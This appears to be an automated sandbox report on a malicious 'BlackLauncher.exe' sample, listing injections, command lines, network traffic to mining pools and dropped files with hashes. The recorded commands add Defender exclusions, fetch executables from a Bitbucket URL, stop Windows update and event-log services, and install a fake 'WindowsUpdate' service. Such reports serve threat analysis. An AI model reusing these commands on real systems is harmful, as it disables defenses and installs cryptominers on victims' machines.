PID 4724 wrote to memory of 3184 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\conhost.exe
PID 4724 wrote to memory of 3184 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\conhost.exe
PID 4724 wrote to memory of 3184 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\conhost.exe
PID 4724 wrote to memory of 3184 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\conhost.exe
PID 4724 wrote to memory of 3184 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\conhost.exe
PID 4724 wrote to memory of 3184 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\conhost.exe
PID 4724 wrote to memory of 4748 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\svchost.exe
PID 4724 wrote to memory of 4748 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\svchost.exe
PID 4724 wrote to memory of 4748 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\svchost.exe
PID 4724 wrote to memory of 4748 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\svchost.exe
PID 4724 wrote to memory of 4748 N/A C:\ProgramData\Windows11\Updater.exe C:\Windows\system32\svchost.exe
PID 4548 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4548 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x320

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command " Start-Process -FilePath 'C:/Users/Admin/AppData/Local/Temp/BlackLauncher.exe' -ArgumentList '--rendering-driver opengl3 --admin-requested' -Verb RunAs "

C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe

"C:\Users\Admin\AppData\Local\Temp\BlackLauncher.exe" --rendering-driver opengl3 --admin-requested

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command " Add-MpPreference -ExclusionPath 'C:\'; "

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/Updatemmmm.exe' -OutFile 'C:/ProgramData/Update/pROUy3v.exe'""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/Updatemmmm.exe' -OutFile 'C:/ProgramData/Update/pROUy3v.exe'"

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/UpdateSSSS.exe' -OutFile 'C:/ProgramData/Update/vdVaFs5.exe'""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'https://bitbucket.org/programmerbfh/softbfh/downloads/UpdateSSSS.exe' -OutFile 'C:/ProgramData/Update/vdVaFs5.exe'"

C:\ProgramData\Update\pROUy3v.exe

C:\ProgramData\Update\pROUy3v.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\ProgramData\Update\vdVaFs5.exe

C:\ProgramData\Update\vdVaFs5.exe

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "WindowsUpdate"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "WindowsUpdate" binpath= "C:\ProgramData\Windows11\Updater.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "WindowsUpdate"

C:\ProgramData\Windows11\Updater.exe

C:\ProgramData\Windows11\Updater.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop wuauserv

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop bits

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop dosvc

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\svchost.exe

svchost.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command " Add-MpPreference -ExclusionPath 'C:\'; "

Network

Country Destination Domain Proto
US 8.8.8.8:53 bitbucket.org udp
US 104.192.141.1:443 bitbucket.org tcp
US 8.8.8.8:53 bbuseruploads.s3.amazonaws.com udp
US 52.217.135.65:443 bbuseruploads.s3.amazonaws.com tcp
US 8.8.8.8:53 65.135.217.52.in-addr.arpa udp
US 8.8.8.8:53 1.141.192.104.in-addr.arpa udp
US 104.192.141.1:443 bitbucket.org tcp
US 8.8.8.8:53 bbuseruploads.s3.amazonaws.com udp
US 3.5.28.77:443 bbuseruploads.s3.amazonaws.com tcp
US 8.8.8.8:53 77.28.5.3.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
CH 185.196.9.26:6302 tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
FR 51.15.193.130:10343 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 26.9.196.185.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 130.193.15.51.in-addr.arpa udp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
PL 51.68.137.186:10343 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 186.137.68.51.in-addr.arpa udp
US 8.8.8.8:53 14.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp

Files

memory/3500-19-0x0000024D68EB0000-0x0000024D68ED2000-memory.dmp

memory/3500-22-0x0000024D69080000-0x0000024D690F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cpbmhpzc.tdf.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Roaming\Godot\app_userdata\NewLauncher\logs\godot.log

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Godot\app_userdata\NewLauncher\shader_cache\SceneShaderGLES3\b8b300d8960ddf9f2e23f580909c77c774494a19eea0be58441e7393b5b6593c\fa7b62523470356194bdf709eb2639ab149a07cc.cache

MD5 a272a406be702b21b0b1a3382b88444a
SHA1 bb2d40557e9e4d3db8f468b9d55c9abe5bbe33f3
SHA256 ee6193d85ae6e99d26669f1bdf5fdce7c2f38f38350341dc03783799941a9de6
SHA512 64d62f434880eb4668ac01df9576ca6c2b7fa7a7e3b7ca8f92b4965ad5b1f1f3c0a129dc0dd5495b19f36e59c2b721443716279154b17d0a8a77e4177d94b1f4

C:\Users\Admin\AppData\Roaming\Godot\app_userdata\NewLauncher\shader_cache\CopyShaderGLES3\600540f4401230daf6f94143fce3c800b0bc15f0f3dcbb1d423709df581135ef\fa7b62523470356194bdf709eb2639ab149a07cc.cache

MD5 6fe39f9e93796b6d34b5fbf30caa4d75
SHA1 80ea777c8646f2edccad68e2f1f00c05ac084d51
SHA256 8075b36b512f632fdc1cb2028c4c9a21d4f1baf9ff2f64dc4d3857f9edb1b0b4
SHA512 992385567a2c8d679f03adaaa3025e9d37e21021e4684c7e5e0aa1f634150a89d6b054fa06914f8c534c2a91304358ef2018057c377477f9886065a19f41b150

C:\Users\Admin\AppData\Roaming\Godot\app_userdata\NewLauncher\shader_cache\CanvasShaderGLES3\93783db0c338a2f64067c117bfba92aa04dd299bfe1fae15f2c90234aba6f117\fa7b62523470356194bdf709eb2639ab149a07cc.cache

MD5 a59a08a5a323b2188bb9c7ae3d55513b
SHA1 b744cc17c893963b3a167a8594ac841b5008b96c
SHA256 1333f9d02221fe0423a43bcfe841ad8d63cc5212dc40a2589c63c108a019e4d9
SHA512 a1f089a437a7307e3287a2a58d8649708e6b8e8777ade8188202b51aebde981c74d1b95b3ab5cd1b613416a62236d08d5e80785159240c009fab32f9d734ffad

memory/4396-55-0x00007FF6141A0000-0x00007FF618502000-memory.dmp

memory/4548-61-0x00007FF6141A0000-0x00007FF618502000-memory.dmp

memory/4548-62-0x00007FF6141A0000-0x00007FF618502000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 5d574dc518025fad52b7886c1bff0e13
SHA1 68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7
SHA256 755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2
SHA512 21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 25cc7fa9acdb035f977e2b8dd376530d
SHA1 66440c4ef643007c5b9aa99e8420b6e750c8de8f
SHA256 eda1f76078f29ba768a8d27e70678ba7f16f346d232f95d1e8788df1ea1bb666
SHA512 f1b9cb79707a926089a97396db9ed2940875e6c2d97638208171e5114c7893e3ae26004cc6f45c9236f469d55dbc2077178df68704e445e624e06ea04ce89cfc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 910ec3e745c8acc38fab61b097f35b77
SHA1 24ad6c3e786c32d0f819588cad86cd24a5fa9a6a
SHA256 4763872528910615d1b4d6726ac5a8c042fb8f2378ddf249a3ac267958f227f9
SHA512 a5d90ece095a405884e148a6d46ef9f1d96d95dc37ed7c215b4d9432534a86d4262081a412117105f6b0bf5eee6a504de1275e8661bfa718c5ef2ba6413387e3

memory/4548-129-0x00007FF6141A0000-0x00007FF618502000-memory.dmp

memory/4548-138-0x00007FF6141A0000-0x00007FF618502000-memory.dmp

memory/4548-139-0x00007FF6141A0000-0x00007FF618502000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ce426674fa9f8557fc70959699b837fa
SHA1 13379f99e1d7e25537c4c85d3ef042d31baede92
SHA256 c7754795670afb3d3ece891195b184629b513a078fd5c78763d82693c6da3c8e
SHA512 6cd49aeb172324b9ef770958691c0b908a01e23bd03c3f75043b944e13e19294c830a16a33bb2e58bccc7ed1dc85fabc03847e2a843d42f3e925cafbd5275ee9

memory/4548-165-0x00007FF6141A0000-0x00007FF618502000-memory.dmp

C:\ProgramData\Update\vdVaFs5.exe

MD5 ad2867dc002af2cca594f0b8202a1843
SHA1 73b3ea99db621b71e7a4a13720c53ebe3a815521
SHA256 2c0e4b4e5535c97fbf45309cbe7ff05006f06db1f3bf31983c7b0e7a7753900d
SHA512 cfb6c5f1333187e0e807a3b2beb72cb50805fac403b900242afce017ccde5a677d7b8c6be86fb9933db64103cb78b17c57fdec4c764f14c89793a5ec3e309108

C:\ProgramData\Update\pROUy3v.exe

MD5 61d3abff46a6bd2946925542c7d30397
SHA1 1fed80a136e67a5b7b6846010a5853400886ee9c
SHA256 b1a351ee61443b8558934dca6b2fa9efb0a6d2d18bae61ace5a761596604dbfa
SHA512 e9e25995faff34da94d30394474471dba45f5993a2efd07f5fb8c15cfdf7b3efa7c89d6796c66323938a1c31b3b89bd7578bef7c4297c6a9b68811f00aa89975

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 174ca7d96de1ececd15503f679acafb5
SHA1 2290e1be0fff941e769cdda7c4907418e983c547
SHA256 d89963e1b500b9e9d62cdaf1f835496e6999c778d8e93578be90342e5560f171
SHA512 896f54a8931a53f518f08255da0ff9ebcf36b3ceb14585bf3183fed281ea8aa883516a90f9b3403043fc071d66ea41d0b726055c36753b8b48996654a112fb2e

memory/4548-175-0x00007FF6141A0000-0x00007FF618502000-memory.dmp

memory/4304-220-0x0000000000500000-0x0000000000598000-memory.dmp

memory/4304-222-0x0000000000D00000-0x0000000000D06000-memory.dmp

\Users\Admin\AppData\Roaming\d3d9.dll

MD5 106fe1980dbcb4fa2fe0c00b6d6fa7c2
SHA1 5cb7eb7be8f3d1641cb458024d868363658a2955
SHA256 c0716389100b55b09f46fafef37bb7d120453df3bfb1097dcd30e14bb97c09bc
SHA512 c9d48c5f5ecf83012f1cc16581b7bb283265a3808847af46195987c7b0721116fe7241185d67b5d7636080881da5f18df04e57e309ff5a133046dd87ca8d06ce

memory/1660-235-0x0000000000400000-0x0000000000450000-memory.dmp

memory/1660-239-0x0000000005430000-0x000000000592E000-memory.dmp

memory/1660-240-0x0000000004FD0000-0x0000000005062000-memory.dmp

memory/1660-253-0x0000000004F30000-0x0000000004F3A000-memory.dmp

memory/320-258-0x000002BED0770000-0x000002BED078C000-memory.dmp

memory/320-264-0x000002BED0940000-0x000002BED09F9000-memory.dmp

memory/320-298-0x000002BED0790000-0x000002BED079A000-memory.dmp

memory/1660-303-0x0000000005F40000-0x0000000006546000-memory.dmp

memory/1660-356-0x0000000005270000-0x000000000537A000-memory.dmp

memory/1660-357-0x0000000005180000-0x0000000005192000-memory.dmp

memory/1660-358-0x00000000051E0000-0x000000000521E000-memory.dmp

memory/1660-375-0x0000000005380000-0x00000000053CB000-memory.dmp

memory/3184-396-0x0000000140000000-0x000000014000E000-memory.dmp

memory/3184-399-0x0000000140000000-0x000000014000E000-memory.dmp

memory/4748-400-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4748-403-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4748-407-0x00000201F4C90000-0x00000201F4CB0000-memory.dmp

memory/4748-404-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4748-405-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4748-406-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4748-411-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4748-412-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4748-409-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4748-408-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4748-410-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4748-402-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4748-401-0x0000000140000000-0x0000000140848000-memory.dmp

memory/3184-395-0x0000000140000000-0x000000014000E000-memory.dmp

memory/3184-394-0x0000000140000000-0x000000014000E000-memory.dmp

memory/3184-393-0x0000000140000000-0x000000014000E000-memory.dmp

memory/3184-392-0x0000000140000000-0x000000014000E000-memory.dmp

memory/4548-413-0x00007FF6141A0000-0x00007FF618502000-memory.dmp

memory/1660-414-0x00000000059F0000-0x0000000005A56000-memory.dmp

memory/4748-415-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1660-416-0x0000000006980000-0x0000000006B42000-memory.dmp

memory/1660-417-0x0000000007080000-0x00000000075AC000-memory.dmp

memory/1660-418-0x0000000006900000-0x0000000006950000-memory.dmp

memory/4548-419-0x00007FF6141A0000-0x00007FF618502000-memory.dmp

memory/4548-421-0x00007FF6141A0000-0x00007FF618502000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ff85f09f39c29eed17ea8954d5512aae
SHA1 10dee2e70802b552f752251e75bb678b91f0c172
SHA256 47d3cba5e92ca1194a130906ab17b82e9a70670f4820be8a04cd619065a0edc6
SHA512 bdc3ec9f6cfe78112b2ef516955b8973a445fffc84215a5d0b883c98af5a5237b6fd31ad7f75bd783d2e413414e6b7be505aec0e3a4d38e2b8c0a6f1a526b3fe

memory/4548-466-0x00007FF6141A0000-0x00007FF618502000-memory.dmp

memory/4748-469-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4748-470-0x0000000140000000-0x0000000140848000-memory.dmp